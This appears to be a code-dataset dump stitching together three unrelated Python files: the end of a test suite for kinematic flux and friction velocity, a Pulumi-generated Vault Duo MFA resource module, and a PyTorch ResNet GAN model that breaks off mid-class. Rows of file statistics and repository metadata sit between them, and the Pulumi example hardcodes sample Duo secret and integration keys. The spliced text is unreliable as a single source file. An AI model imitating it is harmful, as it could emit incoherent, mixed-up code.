assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=0),
kinematic_flux(v, w, perturbation=True, axis=0))
# non use a non-zero mean
u, v, w, kf_true = self.get_uvw_and_known_kf_non_zero_mean()
u = np.array([u, u, u]).transpose()
v = np.array([v, v, v]).transpose()
w = np.array([w, w, w]).transpose()
for key in kf_true.keys():
tmp = kf_true[key]
kf_true[key] = np.array([tmp, tmp, tmp]).transpose()
assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=0),
kf_true['uv'])
assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=0),
kf_true['uw'])
assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=0),
kf_true['vw'])
class TestFrictionVelocity(object):
def get_uvw_and_known_u_star_zero_mean(self):
u = np.array([-2, -1, 0, 1, 2])
v = -u
w = 2 * u
u_star_true = {'uw': 2.0, 'uwvw': 2.3784142300054421}
return u, v, w, u_star_true
def get_uvw_and_known_u_star_non_zero_mean(self):
u = np.array([-2, -1, 0, 1, 5])
v = -u
w = 2 * u
u_star_true = {'uw': 3.4176014981270124, 'uwvw': 4.0642360178166017}
return u, v, w, u_star_true
def test_u_star_1d(self):
u, v, w, u_star_true = self.get_uvw_and_known_u_star_zero_mean()
assert_almost_equal(friction_velocity(u, w, perturbation=False),
u_star_true['uw'])
assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False),
u_star_true['uwvw'])
# now use a non-zero mean
u, v, w, u_star_true = self.get_uvw_and_known_u_star_non_zero_mean()
assert_almost_equal(friction_velocity(u, w, perturbation=False),
u_star_true['uw'])
assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False),
u_star_true['uwvw'])
def test_u_star_2d_axis_last(self):
u, v, w, u_star_true = self.get_uvw_and_known_u_star_zero_mean()
u = np.array([u, u, u])
v = np.array([v, v, v])
w = np.array([w, w, w])
for key in u_star_true.keys():
tmp = u_star_true[key]
u_star_true[key] = np.array([tmp, tmp, tmp])
assert_almost_equal(friction_velocity(u, w, perturbation=False,
axis=-1), u_star_true['uw'])
assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False,
axis=-1), u_star_true['uwvw'])
# now use a non-zero mean
u, v, w, u_star_true = self.get_uvw_and_known_u_star_non_zero_mean()
u = np.array([u, u, u])
v = np.array([v, v, v])
w = np.array([w, w, w])
for key in u_star_true.keys():
tmp = u_star_true[key]
u_star_true[key] = np.array([tmp, tmp, tmp])
assert_almost_equal(friction_velocity(u, w, perturbation=False,
axis=-1), u_star_true['uw'])
assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False,
axis=-1), u_star_true['uwvw'])
def test_u_star_2d_axis_first(self):
u, v, w, u_star_true = self.get_uvw_and_known_u_star_zero_mean()
u = np.array([u, u, u]).transpose()
v = np.array([v, v, v]).transpose()
w = np.array([w, w, w]).transpose()
for key in u_star_true.keys():
tmp = u_star_true[key]
u_star_true[key] = np.array([tmp, tmp, tmp]).transpose()
assert_almost_equal(friction_velocity(u, w, perturbation=False,
axis=0), u_star_true['uw'])
assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False,
axis=0), u_star_true['uwvw'])
# now use a non-zero mean
u, v, w, u_star_true = self.get_uvw_and_known_u_star_non_zero_mean()
u = np.array([u, u, u]).transpose()
v = np.array([v, v, v]).transpose()
w = np.array([w, w, w]).transpose()
for key in u_star_true.keys():
tmp = u_star_true[key]
u_star_true[key] = np.array([tmp, tmp, tmp]).transpose()
assert_almost_equal(friction_velocity(u, w, perturbation=False,
axis=0), u_star_true['uw'])
assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False,
axis=0), u_star_true['uwvw'])
| 45.478916 | 79 | 0.592821 | 2,214 | 15,099 | 3.771003 | 0.054201 | 0.045275 | 0.084321 | 0.080848 | 0.889448 | 0.871721 | 0.852437 | 0.814109 | 0.793508 | 0.743682 | 0 | 0.019809 | 0.284522 | 15,099 | 331 | 80 | 45.616314 | 0.753032 | 0.078085 | 0 | 0.70696 | 0 | 0 | 0.006913 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 1 | 0.102564 | false | 0 | 0.010989 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5f83a4bf858120d863a9c01a16d800340842b8bb | 24,089 | py | Python | sdk/python/pulumi_vault/mfa_duo.py | pulumi/pulumi-vault | 1682875f4a5d7d508f36e166529ad2b8aec34090 | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2019-10-07T17:44:18.000Z | 2022-03-30T20:46:33.000Z | sdk/python/pulumi_vault/mfa_duo.py | pulumi/pulumi-vault | 1682875f4a5d7d508f36e166529ad2b8aec34090 | [
"ECL-2.0",
"Apache-2.0"
] | 79 | 2019-10-11T18:13:07.000Z | 2022-03-31T21:09:41.000Z | sdk/python/pulumi_vault/mfa_duo.py | pulumi/pulumi-vault | 1682875f4a5d7d508f36e166529ad2b8aec34090 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2019-10-28T10:08:40.000Z | 2020-03-17T14:20:55.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['MfaDuoArgs', 'MfaDuo']
@pulumi.input_type
class MfaDuoArgs:
def __init__(__self__, *,
api_hostname: pulumi.Input[str],
integration_key: pulumi.Input[str],
mount_accessor: pulumi.Input[str],
secret_key: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None,
push_info: Optional[pulumi.Input[str]] = None,
username_format: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a MfaDuo resource.
:param pulumi.Input[str] api_hostname: `(string: <required>)` - API hostname for Duo.
:param pulumi.Input[str] integration_key: `(string: <required>)` - Integration key for Duo.
:param pulumi.Input[str] mount_accessor: `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
:param pulumi.Input[str] secret_key: `(string: <required>)` - Secret key for Duo.
:param pulumi.Input[str] name: `(string: <required>)` – Name of the MFA method.
:param pulumi.Input[str] push_info: `(string)` - Push information for Duo.
:param pulumi.Input[str] username_format: `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
- alias.name: The name returned by the mount configured via the `mount_accessor` parameter
- entity.name: The name configured for the Entity
- alias.metadata.`<key>`: The value of the Alias's metadata parameter
- entity.metadata.`<key>`: The value of the Entity's metadata parameter
"""
pulumi.set(__self__, "api_hostname", api_hostname)
pulumi.set(__self__, "integration_key", integration_key)
pulumi.set(__self__, "mount_accessor", mount_accessor)
pulumi.set(__self__, "secret_key", secret_key)
if name is not None:
pulumi.set(__self__, "name", name)
if push_info is not None:
pulumi.set(__self__, "push_info", push_info)
if username_format is not None:
pulumi.set(__self__, "username_format", username_format)
@property
@pulumi.getter(name="apiHostname")
def api_hostname(self) -> pulumi.Input[str]:
"""
`(string: <required>)` - API hostname for Duo.
"""
return pulumi.get(self, "api_hostname")
@api_hostname.setter
def api_hostname(self, value: pulumi.Input[str]):
pulumi.set(self, "api_hostname", value)
@property
@pulumi.getter(name="integrationKey")
def integration_key(self) -> pulumi.Input[str]:
"""
`(string: <required>)` - Integration key for Duo.
"""
return pulumi.get(self, "integration_key")
@integration_key.setter
def integration_key(self, value: pulumi.Input[str]):
pulumi.set(self, "integration_key", value)
@property
@pulumi.getter(name="mountAccessor")
def mount_accessor(self) -> pulumi.Input[str]:
"""
`(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
"""
return pulumi.get(self, "mount_accessor")
@mount_accessor.setter
def mount_accessor(self, value: pulumi.Input[str]):
pulumi.set(self, "mount_accessor", value)
@property
@pulumi.getter(name="secretKey")
def secret_key(self) -> pulumi.Input[str]:
"""
`(string: <required>)` - Secret key for Duo.
"""
return pulumi.get(self, "secret_key")
@secret_key.setter
def secret_key(self, value: pulumi.Input[str]):
pulumi.set(self, "secret_key", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
`(string: <required>)` – Name of the MFA method.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="pushInfo")
def push_info(self) -> Optional[pulumi.Input[str]]:
"""
`(string)` - Push information for Duo.
"""
return pulumi.get(self, "push_info")
@push_info.setter
def push_info(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "push_info", value)
@property
@pulumi.getter(name="usernameFormat")
def username_format(self) -> Optional[pulumi.Input[str]]:
"""
`(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
- alias.name: The name returned by the mount configured via the `mount_accessor` parameter
- entity.name: The name configured for the Entity
- alias.metadata.`<key>`: The value of the Alias's metadata parameter
- entity.metadata.`<key>`: The value of the Entity's metadata parameter
"""
return pulumi.get(self, "username_format")
@username_format.setter
def username_format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username_format", value)
@pulumi.input_type
class _MfaDuoState:
def __init__(__self__, *,
api_hostname: Optional[pulumi.Input[str]] = None,
integration_key: Optional[pulumi.Input[str]] = None,
mount_accessor: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
push_info: Optional[pulumi.Input[str]] = None,
secret_key: Optional[pulumi.Input[str]] = None,
username_format: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering MfaDuo resources.
:param pulumi.Input[str] api_hostname: `(string: <required>)` - API hostname for Duo.
:param pulumi.Input[str] integration_key: `(string: <required>)` - Integration key for Duo.
:param pulumi.Input[str] mount_accessor: `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
:param pulumi.Input[str] name: `(string: <required>)` – Name of the MFA method.
:param pulumi.Input[str] push_info: `(string)` - Push information for Duo.
:param pulumi.Input[str] secret_key: `(string: <required>)` - Secret key for Duo.
:param pulumi.Input[str] username_format: `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
- alias.name: The name returned by the mount configured via the `mount_accessor` parameter
- entity.name: The name configured for the Entity
- alias.metadata.`<key>`: The value of the Alias's metadata parameter
- entity.metadata.`<key>`: The value of the Entity's metadata parameter
"""
if api_hostname is not None:
pulumi.set(__self__, "api_hostname", api_hostname)
if integration_key is not None:
pulumi.set(__self__, "integration_key", integration_key)
if mount_accessor is not None:
pulumi.set(__self__, "mount_accessor", mount_accessor)
if name is not None:
pulumi.set(__self__, "name", name)
if push_info is not None:
pulumi.set(__self__, "push_info", push_info)
if secret_key is not None:
pulumi.set(__self__, "secret_key", secret_key)
if username_format is not None:
pulumi.set(__self__, "username_format", username_format)
@property
@pulumi.getter(name="apiHostname")
def api_hostname(self) -> Optional[pulumi.Input[str]]:
"""
`(string: <required>)` - API hostname for Duo.
"""
return pulumi.get(self, "api_hostname")
@api_hostname.setter
def api_hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_hostname", value)
@property
@pulumi.getter(name="integrationKey")
def integration_key(self) -> Optional[pulumi.Input[str]]:
"""
`(string: <required>)` - Integration key for Duo.
"""
return pulumi.get(self, "integration_key")
@integration_key.setter
def integration_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "integration_key", value)
@property
@pulumi.getter(name="mountAccessor")
def mount_accessor(self) -> Optional[pulumi.Input[str]]:
"""
`(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
"""
return pulumi.get(self, "mount_accessor")
@mount_accessor.setter
def mount_accessor(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mount_accessor", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
`(string: <required>)` – Name of the MFA method.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="pushInfo")
def push_info(self) -> Optional[pulumi.Input[str]]:
"""
`(string)` - Push information for Duo.
"""
return pulumi.get(self, "push_info")
@push_info.setter
def push_info(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "push_info", value)
@property
@pulumi.getter(name="secretKey")
def secret_key(self) -> Optional[pulumi.Input[str]]:
"""
`(string: <required>)` - Secret key for Duo.
"""
return pulumi.get(self, "secret_key")
@secret_key.setter
def secret_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret_key", value)
@property
@pulumi.getter(name="usernameFormat")
def username_format(self) -> Optional[pulumi.Input[str]]:
"""
`(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
- alias.name: The name returned by the mount configured via the `mount_accessor` parameter
- entity.name: The name configured for the Entity
- alias.metadata.`<key>`: The value of the Alias's metadata parameter
- entity.metadata.`<key>`: The value of the Entity's metadata parameter
"""
return pulumi.get(self, "username_format")
@username_format.setter
def username_format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username_format", value)
class MfaDuo(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_hostname: Optional[pulumi.Input[str]] = None,
integration_key: Optional[pulumi.Input[str]] = None,
mount_accessor: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
push_info: Optional[pulumi.Input[str]] = None,
secret_key: Optional[pulumi.Input[str]] = None,
username_format: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a resource to manage [Duo MFA](https://www.vaultproject.io/docs/enterprise/mfa/mfa-duo.html).
**Note** this feature is available only with Vault Enterprise.
## Example Usage
```python
import pulumi
import pulumi_vault as vault
userpass = vault.AuthBackend("userpass",
type="userpass",
path="userpass")
my_duo = vault.MfaDuo("myDuo",
mount_accessor=userpass.accessor,
secret_key="8C7THtrIigh2rPZQMbguugt8IUftWhMRCOBzbuyz",
integration_key="BIACEUEAXI20BNWTEYXT",
api_hostname="api-2b5c39f5.duosecurity.com")
```
## Import
Mounts can be imported using the `path`, e.g.
```sh
$ pulumi import vault:index/mfaDuo:MfaDuo my_duo my_duo
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_hostname: `(string: <required>)` - API hostname for Duo.
:param pulumi.Input[str] integration_key: `(string: <required>)` - Integration key for Duo.
:param pulumi.Input[str] mount_accessor: `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
:param pulumi.Input[str] name: `(string: <required>)` – Name of the MFA method.
:param pulumi.Input[str] push_info: `(string)` - Push information for Duo.
:param pulumi.Input[str] secret_key: `(string: <required>)` - Secret key for Duo.
:param pulumi.Input[str] username_format: `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
- alias.name: The name returned by the mount configured via the `mount_accessor` parameter
- entity.name: The name configured for the Entity
- alias.metadata.`<key>`: The value of the Alias's metadata parameter
- entity.metadata.`<key>`: The value of the Entity's metadata parameter
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MfaDuoArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a resource to manage [Duo MFA](https://www.vaultproject.io/docs/enterprise/mfa/mfa-duo.html).
**Note** this feature is available only with Vault Enterprise.
## Example Usage
```python
import pulumi
import pulumi_vault as vault
userpass = vault.AuthBackend("userpass",
type="userpass",
path="userpass")
my_duo = vault.MfaDuo("myDuo",
mount_accessor=userpass.accessor,
secret_key="8C7THtrIigh2rPZQMbguugt8IUftWhMRCOBzbuyz",
integration_key="BIACEUEAXI20BNWTEYXT",
api_hostname="api-2b5c39f5.duosecurity.com")
```
## Import
Mounts can be imported using the `path`, e.g.
```sh
$ pulumi import vault:index/mfaDuo:MfaDuo my_duo my_duo
```
:param str resource_name: The name of the resource.
:param MfaDuoArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MfaDuoArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_hostname: Optional[pulumi.Input[str]] = None,
integration_key: Optional[pulumi.Input[str]] = None,
mount_accessor: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
push_info: Optional[pulumi.Input[str]] = None,
secret_key: Optional[pulumi.Input[str]] = None,
username_format: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MfaDuoArgs.__new__(MfaDuoArgs)
if api_hostname is None and not opts.urn:
raise TypeError("Missing required property 'api_hostname'")
__props__.__dict__["api_hostname"] = api_hostname
if integration_key is None and not opts.urn:
raise TypeError("Missing required property 'integration_key'")
__props__.__dict__["integration_key"] = integration_key
if mount_accessor is None and not opts.urn:
raise TypeError("Missing required property 'mount_accessor'")
__props__.__dict__["mount_accessor"] = mount_accessor
__props__.__dict__["name"] = name
__props__.__dict__["push_info"] = push_info
if secret_key is None and not opts.urn:
raise TypeError("Missing required property 'secret_key'")
__props__.__dict__["secret_key"] = secret_key
__props__.__dict__["username_format"] = username_format
super(MfaDuo, __self__).__init__(
'vault:index/mfaDuo:MfaDuo',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_hostname: Optional[pulumi.Input[str]] = None,
integration_key: Optional[pulumi.Input[str]] = None,
mount_accessor: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
push_info: Optional[pulumi.Input[str]] = None,
secret_key: Optional[pulumi.Input[str]] = None,
username_format: Optional[pulumi.Input[str]] = None) -> 'MfaDuo':
"""
Get an existing MfaDuo resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_hostname: `(string: <required>)` - API hostname for Duo.
:param pulumi.Input[str] integration_key: `(string: <required>)` - Integration key for Duo.
:param pulumi.Input[str] mount_accessor: `(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
:param pulumi.Input[str] name: `(string: <required>)` – Name of the MFA method.
:param pulumi.Input[str] push_info: `(string)` - Push information for Duo.
:param pulumi.Input[str] secret_key: `(string: <required>)` - Secret key for Duo.
:param pulumi.Input[str] username_format: `(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
- alias.name: The name returned by the mount configured via the `mount_accessor` parameter
- entity.name: The name configured for the Entity
- alias.metadata.`<key>`: The value of the Alias's metadata parameter
- entity.metadata.`<key>`: The value of the Entity's metadata parameter
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MfaDuoState.__new__(_MfaDuoState)
__props__.__dict__["api_hostname"] = api_hostname
__props__.__dict__["integration_key"] = integration_key
__props__.__dict__["mount_accessor"] = mount_accessor
__props__.__dict__["name"] = name
__props__.__dict__["push_info"] = push_info
__props__.__dict__["secret_key"] = secret_key
__props__.__dict__["username_format"] = username_format
return MfaDuo(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiHostname")
def api_hostname(self) -> pulumi.Output[str]:
"""
`(string: <required>)` - API hostname for Duo.
"""
return pulumi.get(self, "api_hostname")
@property
@pulumi.getter(name="integrationKey")
def integration_key(self) -> pulumi.Output[str]:
"""
`(string: <required>)` - Integration key for Duo.
"""
return pulumi.get(self, "integration_key")
@property
@pulumi.getter(name="mountAccessor")
def mount_accessor(self) -> pulumi.Output[str]:
"""
`(string: <required>)` - The mount to tie this method to for use in automatic mappings. The mapping will use the Name field of Aliases associated with this mount as the username in the mapping.
"""
return pulumi.get(self, "mount_accessor")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
`(string: <required>)` – Name of the MFA method.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="pushInfo")
def push_info(self) -> pulumi.Output[Optional[str]]:
"""
`(string)` - Push information for Duo.
"""
return pulumi.get(self, "push_info")
@property
@pulumi.getter(name="secretKey")
def secret_key(self) -> pulumi.Output[str]:
"""
`(string: <required>)` - Secret key for Duo.
"""
return pulumi.get(self, "secret_key")
@property
@pulumi.getter(name="usernameFormat")
def username_format(self) -> pulumi.Output[Optional[str]]:
"""
`(string)` - A format string for mapping Identity names to MFA method names. Values to substitute should be placed in `{{}}`. For example, `"{{alias.name}}@example.com"`. If blank, the Alias's Name field will be used as-is. Currently-supported mappings:
- alias.name: The name returned by the mount configured via the `mount_accessor` parameter
- entity.name: The name configured for the Entity
- alias.metadata.`<key>`: The value of the Alias's metadata parameter
- entity.metadata.`<key>`: The value of the Entity's metadata parameter
"""
return pulumi.get(self, "username_format")
| 46.865759 | 303 | 0.636639 | 2,914 | 24,089 | 5.084763 | 0.069664 | 0.070527 | 0.087872 | 0.075724 | 0.897078 | 0.880205 | 0.86691 | 0.846595 | 0.825606 | 0.817372 | 0 | 0.001274 | 0.25028 | 24,089 | 513 | 304 | 46.957115 | 0.818771 | 0.423928 | 0 | 0.700758 | 1 | 0 | 0.103205 | 0.002008 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159091 | false | 0.003788 | 0.018939 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5fc283a32f973bd2ab111b0fb00976fe97ccb988 | 11,444 | py | Python | model.py | enisimsar/FIGR | 2a279a42e093821c97fc4b4463f924e9968dd9c1 | [
"MIT"
] | 39 | 2019-05-29T12:54:11.000Z | 2022-03-24T15:33:19.000Z | model.py | enisimsar/FIGR | 2a279a42e093821c97fc4b4463f924e9968dd9c1 | [
"MIT"
] | 4 | 2019-06-18T11:08:51.000Z | 2020-04-23T09:45:39.000Z | model.py | enisimsar/FIGR | 2a279a42e093821c97fc4b4463f924e9968dd9c1 | [
"MIT"
] | 13 | 2019-07-06T23:19:15.000Z | 2022-01-20T16:16:49.000Z | import torch.nn as nn
import torch.nn.functional as F
class ResNetGenerator(nn.Module):
def __init__(self, input_size, image_channels=1, height=32, length=32, hidden_size=64, blocks=4):
super(ResNetGenerator, self).__init__()
self.hidden_size = hidden_size
self.blocks = blocks
self.height = height
self.length = length
self.mult = 2**blocks
self.initial_linear = nn.Linear(input_size, hidden_size * self.mult * height//self.mult * length//self.mult)
self.initial_norm = nn.LayerNorm(hidden_size * self.mult * height//self.mult * length//self.mult)
self.initial_activ = nn.PReLU(hidden_size * self.mult * height//self.mult * length//self.mult)
self.convs1 = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i
in range(blocks)])
self.norm1 = nn.ModuleList([nn.LayerNorm(
[hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in
range(blocks)])
self.activ1 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])
self.convs2 = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i
in range(blocks)])
self.norm2 = nn.ModuleList([nn.LayerNorm(
[hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in
range(blocks)])
self.activ2 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])
self.convs3 = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i
in range(blocks)])
self.norm3 = nn.ModuleList([nn.LayerNorm(
[hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in
range(blocks)])
self.activ3 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])
self.convs4 = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i
in range(blocks)])
self.norm4 = nn.ModuleList([nn.LayerNorm(
[hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in
range(blocks)])
self.activ4 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])
self.transitions_conv = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i - 1), (3, 3), padding=(1, 1)) for
i in range(blocks)])
self.transitions_norm = nn.ModuleList([nn.LayerNorm(
[hidden_size * 2 ** (blocks - i - 1), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in
range(blocks)])
self.transitions_activ = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i - 1)) for i in range(blocks)])
self.final_conv = nn.Conv2d(hidden_size, image_channels, (5, 5), padding=(2, 2))
self.final_activ = nn.Tanh()
def forward(self, inputs):
x = self.initial_linear(inputs)
x = self.initial_activ(x)
x = self.initial_norm(x)
x = x.view(x.shape[0], self.hidden_size * self.mult, self.height//self.mult, self.length//self.mult)
for i in range(self.blocks):
fx = self.convs1[i](x)
fx = self.activ1[i](fx)
fx = self.norm1[i](fx)
fx = self.convs2[i](fx)
fx = self.activ2[i](fx)
fx = self.norm2[i](fx)
x = x + fx
fx = self.convs3[i](x)
fx = self.activ3[i](fx)
fx = self.norm3[i](fx)
fx = self.convs4[i](fx)
fx = self.activ4[i](fx)
fx = self.norm4[i](fx)
x = x + fx
x = self.transitions_conv[i](x)
x = self.transitions_activ[i](x)
x = self.transitions_norm[i](x)
x = F.upsample(x, scale_factor=2)
x = self.final_conv(x)
x = self.final_activ(x)
return x
class ResNetDiscriminator(nn.Module):
def __init__(self, image_channels=1, height=32, length=32, hidden_size=64, blocks=4):
super(ResNetDiscriminator, self).__init__()
self.hidden_size = hidden_size
self.blocks = blocks
self.initial_conv = nn.Conv2d(image_channels, hidden_size, (7, 7), padding=(3, 3))
self.initial_norm = nn.LayerNorm([hidden_size, height, length])
self.initial_activ = nn.PReLU(hidden_size)
self.convs1 = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** i, hidden_size * 2 ** i, (3, 3), padding=(1, 1)) for
i in range(blocks)])
self.norm1 = nn.ModuleList([nn.LayerNorm(
[hidden_size * (2 ** i), height // (2 ** i), length // (2 ** i)]) for i
in range(blocks)])
self.activ1 = nn.ModuleList([nn.PReLU(hidden_size * (2 ** i)) for i in range(blocks)])
self.convs2 = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** i, hidden_size * 2 ** i, (3, 3), padding=(1, 1)) for
i in range(blocks)])
self.norm2 = nn.ModuleList([nn.LayerNorm(
[hidden_size * (2 ** i), height // (2 ** i), length // (2 ** i)]) for i
in range(blocks)])
self.activ2 = nn.ModuleList([nn.PReLU(hidden_size * (2 ** i)) for i in range(blocks)])
self.convs3 = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** i, hidden_size * 2 ** i, (3, 3), padding=(1, 1)) for
i in range(blocks)])
self.norm3 = nn.ModuleList([nn.LayerNorm(
[hidden_size * (2 ** i), height // (2 ** i), length // (2 ** i)]) for i
in range(blocks)])
self.activ3 = nn.ModuleList([nn.PReLU(hidden_size * (2 ** i)) for i in range(blocks)])
self.convs4 = nn.ModuleList(
[nn.Conv2d(hidden_size * 2 ** i, hidden_size * 2 ** i, (3, 3), padding=(1, 1)) for
i in range(blocks)])
self.norm4 = nn.ModuleList([nn.LayerNorm(
[hidden_size * (2 ** i), height // (2 ** i), length // (2 ** i)]) for i
in range(blocks)])
self.activ4 = nn.ModuleList([nn.PReLU(hidden_size * (2 ** i)) for i in range(blocks)])
self.transitions_conv = nn.ModuleList(
